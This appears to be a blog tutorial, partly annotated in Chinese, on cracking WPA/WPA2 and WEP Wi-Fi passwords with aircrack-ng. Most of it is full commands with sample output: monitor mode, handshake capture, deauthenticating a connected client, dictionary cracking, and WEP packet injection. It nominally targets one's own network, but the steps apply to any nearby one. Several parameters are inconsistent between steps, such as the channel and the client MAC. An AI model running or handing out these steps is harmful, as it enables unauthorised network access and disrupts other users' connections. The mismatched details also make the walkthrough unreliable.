Crack a WPA/WPA2 Wifi Network

Crack a WPA/WPA2 Wifi Network 

what is the Difference Between cracking a WPA network and WPA2 network,Nothing !! There is no difference between cracking a WPA or WPA2 networks at all.In order to sucessfully crack any WPA/WPA2 network,there are 2 main things must happen

1) U must capture the Full 4 Way Handshake.

2) Your Passphrase must be in the DICTIONARY you choose in order to sucessfully BruteForce.

We will be using the aircrack-ng suite of tools and a small dictionary file on Ubuntu.

There are a few ways to crack a WPA / WPA2 PSK password this is just one of them.

This method is usally vunerable because of the end user, as most people will use a pass phrase thats easy to remember.

bcz evry body doesnt want to keep long password.

You will need the following details

A Client connected to the AP to Deauth

ESSID = this is the Name of your wireless network i.e MYWIRELESS

BSSID = this is the MAC address of your AP and will be in this format 00:1C:10:26:A9:39 everyone’s is different so make sure 

you write it down correctly or the following will not work

Channel = This will be the channel your AP is Broadcasting on i.e channel 7

ALSO you will need a decent dictionary file you can find many of these around on the internet google is your friend on this one,then lets start below are the Steps

Step 1 - Start the wireless interface in monitor mode

alex@alex-laptop:~$ sudo airmon-ng start wlan0

[sudo] password for alex: 

Found 5 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want to kill (some of) them!

PID Name

767 avahi-daemon

768 avahi-daemon

973 NetworkManager

1054 wpa_supplicant

11423 dhclient

Process with PID 11423 (dhclient) is running on interface wlan0

Process with PID 11990 (airodump-ng) is running on interface mon0

Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]

(monitor mode enabled on mon2)

mon0 Intel 3945ABG iwl3945 - [phy0]

mon1 Intel 3945ABG iwl3945 - [phy0]

Step 2 - Start airodump-ng to collect authentication handshake

bssid 通过 iwlist wlan0 scanning  

Airodump-ng -c 6 -w psk –-bssid 00:21:27:47:D3:B0 mon0              //mon1 是上面 sudo airmon-ng start wlan0  后的对于 wlan0 的可介入点。

Where:

-c 11 is the channel for the wireless network

- -bssid 00:21:27:47:D3:B0 is the access point MAC address. This eliminate extraneous traffic.

-w psk is the file name prefix for the file which will contain the IVs.

mon0 is the interface name.

Important: Do NOT use the ”- -ivs” option. You must capture the full packets.

Step 3 - Use aireplay-ng to deauthenticate the wireless client

aireplay-ng -0 3 -a 00:21:27:47:D3:B0 -c 00:1C:BF:54:10:7E  mon0

Where:

-0 means deauthentication

3 is the number of deauths to send (you can send muliple if you wish)

-a 00:21:27:47:D3:B0 is the MAC address of the access point

-c 00:0F:B5:EC:99:6F is the MAC address of the client you are deauthing

mon0 is the interface name

Step 4 - Run aircrack-ng to crack the pre-shared key

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.

There is a small dictionary that comes with aircrack-ng - “password.lst”. This file can be found in the “test” directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can use John the Ripper (JTR) to generate your own list and pipe them into aircrack-ng. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial

aircrack-ng -w dictionary.txt -b 00:21:27:47:D3:B0 psk*.cap

Where:

-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.

*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Done now wait for some time It depends upon ur Dictionary file and the passphrase ,

You should now have your PSK passphrase .      //得到密码。

Reference :

http://www.outpost9.com/files/WordLists.html    WordLists 网址 。

http://wordlist.sourceforge.net/    Kevin's Word List Page

  

http://www.aircrack-ng.org/doku.php?id=cracking_wpa     Tutorial: How to Crack WPA/WPA2

Cracking WEP and WPA Wireless Networks

http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks#Overview

anther way 

1. sudo airmon-ng start wlan0    启动无线 网卡 的监控模式

2.在终端中输入 sudo  airodump-ng mon0 ，启动监控模式后无线端口是mon0（如果启动多次会按数字累加）， 看看有哪些采用wep 加密的AP在线，然后按 ctrl+c 退出，保留终端

3.另开一个终端，输入 sudo airodump-ng -c 6 --bssid 00:1D:0F:7D:D9:1A -w wep mon0
 (-c后面的6为AP工作频道，--bissid后面的AP's MAC 是要欲破解AP的MAC地址，-w后的wep的是抓下来的数据包DATA 保存的文件名（可以随便取名），然后回车开始抓包。

4.再另开一个终端，输入 sudo aireplay-ng -1 0 -a 00:1D:0F:7D:D9:1A -h 00:1c:bf:87:70:66  mon0 

 与AP建立虚拟连接 （-h后面跟着的My MAC 是自己的无线网卡的MAC地址)

5.建立虚拟连接成功后，输入 sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:1D:0F:7D:D9:1A  -h 00:1c:bf:87:70:66  mon0
进行注入，现在步骤3中数据包应该不断增长。

6.收集有5000个以上的DATA之后，另开一个终端，输入 sudo aircrack-ng wep*.cap 进行解密 （如果没算出来的话，继续等，aircrack-ng 会在DATA每增加多5000个之后就自动再运行 ，直到算出密码 为至）

这是破解自己宿舍的路由 。

7、破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式，不然无线网卡会一直向刚刚的AP进行注入的，用ctrl+c退出或者直接关闭终端都是不行的，除非重新启动电脑。